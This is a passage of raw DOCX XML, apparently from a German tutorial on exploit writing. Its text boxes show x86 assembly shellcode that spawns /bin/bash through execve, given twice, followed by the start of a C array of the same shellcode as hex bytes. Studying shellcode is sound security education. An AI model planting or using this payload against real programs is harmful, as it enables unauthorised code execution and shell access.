+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>popl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xorl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %al, 0x9(%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 0xa(%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 0xe(%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $11, %al</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>leal</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0xa(%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>), %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ecx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>leal</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0xe(%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esi</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>), %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>edx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $0x80</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>MyCallStatement</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>call</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">            </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ShellVariables</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ascii</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> "/bin/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bashABBBBCCCC</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>"</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 13" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:22.6pt;width:369pt;height:351.15pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>text</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>.</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>globl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> _</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>_</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>start</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>jmp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>MyCallStatement</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>popl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xorl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %al, 0x9(%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 0xa(%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 0xe(%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $11, %al</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>leal</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0xa(%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>), %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ecx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>leal</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 0xe(%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esi</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>), %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>edx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> $0x80</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>MyCallStatement</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>call</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">            </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ShellVariables</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ascii</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> "/bin/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bashABBBBCCCC</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>"</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Als Assembler Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30EBD23F" wp14:editId="61ED9027">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>254167</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4686300" cy="2743668"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
+                <wp:wrapNone/>
+                <wp:docPr id="14" name="Textfeld 14"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4686300" cy="2743668"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xeb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
